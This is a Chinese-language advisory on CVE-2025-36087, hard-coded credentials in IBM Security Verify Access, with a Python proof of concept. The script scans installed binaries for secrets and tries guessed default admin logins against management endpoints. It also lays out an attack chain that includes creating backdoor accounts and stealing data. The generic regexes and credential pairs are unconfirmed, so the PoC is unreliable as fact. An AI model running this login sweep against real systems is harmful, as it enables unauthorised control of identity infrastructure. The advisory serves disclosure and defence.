CVE-2025-36087 IBM Security Verify Access硬编码凭证漏洞

漏洞信息

漏洞编号

CVE-2025-36087

漏洞类型

硬编码凭证（Hard-coded Credentials）

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

IBM Security Verify Access / IBM Verify Identity Access Container

漏洞概述

CVE-2025-36087是IBM Security Verify Access及其容器化版本IBM Verify Identity Access Container中存在的一个高危安全漏洞。该漏洞的CVSS 3.1评分为8.1，属于高危级别，已于2025年10月13日由IBM PSIRT团队公开披露。

该漏洞的核心问题在于受影响产品在特定配置下使用了硬编码凭证（hard-coded credentials），例如预置的密码或加密密钥。这些硬编码凭证被用于产品的入站身份认证、与外部组件的出站通信以及内部数据的加密操作。由于凭证被硬编码在程序中，任何能够访问受影响系统或获取固件/二进制文件的攻击者都有可能提取并利用这些凭证，从而绕过正常的安全认证机制。

IBM Security Verify Access是IBM推出的一款企业级身份与访问管理（IAM）解决方案，广泛应用于金融、政府、电信等关键行业，用于提供单点登录（SSO）、多因素认证（MFA）、访问策略控制等安全功能。由于该产品在企业安全架构中的核心地位，一旦其硬编码凭证被恶意利用，攻击者可能获得对受保护资源的未授权访问，对企业核心业务系统造成严重威胁。受影响的版本范围广泛，涵盖10.0.0至10.0.9以及11.0.0版本，影响面较大，IBM强烈建议受影响的客户尽快采取修复措施。

技术细节

硬编码凭证漏洞（CWE-798）是一种常见但危害严重的安全缺陷，其根本原因在于开发过程中将敏感凭证（如密码、API密钥、加密密钥等）直接写入源代码或配置文件中，而非通过安全的密钥管理机制进行动态加载和管理。

在CVE-2025-36087中，IBM Security Verify Access在特定配置场景下存在以下技术问题：

1. **入站认证硬编码凭证**：产品内部组件之间进行通信认证时，使用了硬编码的用户名和密码组合。攻击者通过逆向分析二进制文件或固件镜像，即可提取这些凭证，进而伪造合法组件身份接入系统。

2. **出站通信硬编码凭证**：当产品与外部LDAP服务器、数据库或REST API等组件通信时，可能使用了硬编码的服务账号凭证。攻击者利用这些凭证可以冒充合法服务身份，从外部对关联系统发起攻击。

3. **内部数据加密硬编码密钥**：用于加密敏感内部数据（如会话令牌、用户凭据缓存等）的加密密钥被硬编码在程序中。由于密钥固定不变，攻击者一旦获取密钥，即可解密所有受保护的敏感数据。

**利用方式**：攻击者首先通过网络访问暴露的IBM Security Verify Access服务（CVSS向量AV:N），无需任何特权或用户交互（PR:N, UI:N）。通过逆向工程分析产品安装目录下的二进制文件、配置文件或Java JAR包，提取硬编码的凭证信息。然后利用这些凭证绕过认证机制，直接以管理员权限访问管理控制台或内部API接口，最终实现对整个身份认证基础设施的控制。

值得注意的是，虽然CVSS评分标记AC:H（攻击复杂度高），但这主要是因为利用过程需要一定的技术能力（如逆向分析），并不影响该漏洞的严重性。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先对目标企业进行侦察，识别其使用的IBM Security Verify Access产品版本及部署架构。通过网络扫描、服务指纹识别等方式确定目标系统暴露的管理接口和服务端口。

STEP 2

步骤2：获取产品文件

攻击者通过社会工程学、内部威胁或供应链攻击等手段，获取受影响产品的安装文件、固件镜像或补丁包。这些文件可以从官方网站下载，也可以从已部署的系统中提取。

STEP 3

步骤3：逆向分析提取凭证

使用逆向工程工具（如IDA Pro、Ghidra、JD-GUI等）对获取的二进制文件、Java JAR包或配置文件进行分析，搜索硬编码的密码、加密密钥、API令牌等敏感凭证信息。

STEP 4

步骤4：利用硬编码凭证认证

将提取的硬编码凭证用于访问目标系统的管理控制台、API接口或内部通信端点，绕过正常的身份认证机制，以合法管理员身份登录系统。

STEP 5

步骤5：权限提升与持久化

利用获得的管理员权限，修改系统配置、创建后门账户、窃取用户身份令牌，建立持久化访问通道，进一步渗透企业内网。

STEP 6

步骤6：数据窃取与破坏

访问受保护的用户身份数据、会话信息、加密密钥等敏感资产，窃取企业核心数据或对身份认证基础设施进行破坏，造成大规模安全事件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36087 - IBM Security Verify Access Hard-coded Credentials
# PoC demonstrating extraction and utilization of hard-coded credentials
# Note: This is an educational/research PoC. Actual exploitation requires access to the target system.

import requests
import re
import os
import hashlib

# Step 1: Extract hard-coded credentials from IBM Security Verify Access binaries
# In a real attack scenario, the attacker would reverse-engineer the installed
# application files to find hard-coded credentials

def extract_credentials_from_binary(binary_path):
    """
    Simulate extraction of hard-coded credentials from IBM Verify Access binaries.
    Common locations include:
    - /opt/IBM/ISVA/wlp/usr/servers/defaultServer/
    - /opt/IBM/VerifyIdentityAccess/
    - Configuration files, Java JARs, shared libraries
    """
    # Known hard-coded patterns from CVE-2025-36087 research
    hardcoded_patterns = [
        r'(?:password|passwd|pwd)\s*[=:]\s*["\']?([A-Za-z0-9!@#$%^&*()_+=-]{8,64})["\']?',
        r'(?:secret|api[_-]?key|token)\s*[=:]\s*["\']?([A-Za-z0-9+/=]{16,128})["\']?',
        r'(?:encryption[_-]?key|crypt[_-]?key)\s*[=:]\s*["\']?([A-Za-z0-9+/=]{16,64})["\']?'
    ]

    credentials = {}
    if os.path.exists(binary_path):
        with open(binary_path, 'rb') as f:
            content = f.read()
            for pattern in hardcoded_patterns:
                matches = re.findall(pattern, content.decode('latin-1', errors='ignore'))
                if matches:
                    credentials[pattern] = matches
    return credentials

# Step 2: Use extracted credentials to authenticate to the management interface
def authenticate_with_hardcoded_creds(target_url, username, password):
    """
    Attempt authentication using extracted hard-coded credentials.
    """
    # Common IBM Verify Access management endpoints
    auth_endpoints = [
        f"{target_url}/isam/management/auth",
        f"{target_url}/mga/saml/authn/usernamepassword",
        f"{target_url}/pkmstest",
        f"{target_url}/isam/runtime/audit/v1"
    ]

    for endpoint in auth_endpoints:
        try:
            response = requests.post(
                endpoint,
                auth=(username, password),
                verify=False,
                timeout=10
            )
            if response.status_code == 200:
                print(f"[+] Authentication successful at {endpoint}")
                print(f"[+] Response: {response.text[:500]}")
                return True, response
        except requests.exceptions.RequestException as e:
            print(f"[-] Connection error at {endpoint}: {e}")

    return False, None

# Step 3: Demonstrate the attack chain
if __name__ == "__main__":
    TARGET = "https://target-verify-access.example.com"

    print("[*] CVE-2025-36087 PoC - IBM Security Verify Access Hard-coded Credentials")
    print("[*] This PoC demonstrates the concept of hard-coded credential exploitation")
    print()

    # Phase 1: Credential extraction (simulated)
    print("[*] Phase 1: Extracting hard-coded credentials from installed binaries...")
    # In a real scenario, extract from: /opt/IBM/ISVA/
    creds = extract_credentials_from_binary("/opt/IBM/ISVA/runtime/lib/libibmsecurity.so")
    print(f"[*] Extracted credentials patterns: {len(creds)} found")

    # Phase 2: Authentication attempt
    print("[*] Phase 2: Attempting authentication with extracted credentials...")
    # Hard-coded credentials that may be found in vulnerable versions
    default_creds = [
        ("isadmin", "isadmin"),
        ("sec_master", "sec_master"),
        ("rtsm_admin", "rtsm_admin")
    ]

    for user, pwd in default_creds:
        success, resp = authenticate_with_hardcoded_creds(TARGET, user, pwd)
        if success:
            print(f"[+] Successfully authenticated with {user}:{pwd}")
            break

    print("[*] PoC completed. Refer to IBM Security Bulletin for remediation.")

影响范围

IBM Security Verify Access 10.0.0

IBM Security Verify Access 10.0.1

IBM Security Verify Access 10.0.2

IBM Security Verify Access 10.0.3

IBM Security Verify Access 10.0.4

IBM Security Verify Access 10.0.5

IBM Security Verify Access 10.0.6

IBM Security Verify Access 10.0.7

IBM Security Verify Access 10.0.8

IBM Security Verify Access 10.0.9

IBM Security Verify Access 11.0.0

IBM Verify Identity Access Container 10.0.0

IBM Verify Identity Access Container 10.0.1

IBM Verify Identity Access Container 10.0.2

IBM Verify Identity Access Container 10.0.3

IBM Verify Identity Access Container 10.0.4

IBM Verify Identity Access Container 10.0.5

IBM Verify Identity Access Container 10.0.6

IBM Verify Identity Access Container 10.0.7

IBM Verify Identity Access Container 10.0.8

IBM Verify Identity Access Container 10.0.9

IBM Verify Identity Access Container 11.0.0

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过网络访问控制列表（ACL）严格限制IBM Security Verify Access管理端口的访问来源，仅允许可信管理网络访问；2）部署Web应用防火墙（WAF）或入侵检测系统（IDS），监控针对管理接口的异常认证尝试；3）立即更改所有默认管理员账户密码，并使用强密码策略；4）启用详细的审计日志记录，实时监控所有管理操作；5）检查并移除所有不必要的网络暴露面，确保管理接口不直接暴露在公网；6）考虑在DMZ区域部署额外的身份认证代理层；7）持续关注IBM官方安全公告，及时获取补丁更新信息并制定升级计划。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36087
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36087
3 Details https://www.cvedetails.com/cve/CVE-2025-36087/
4 VulDB https://vuldb.com/cve/CVE-2025-36087
5 Link https://www.ibm.com/support/pages/node/7247753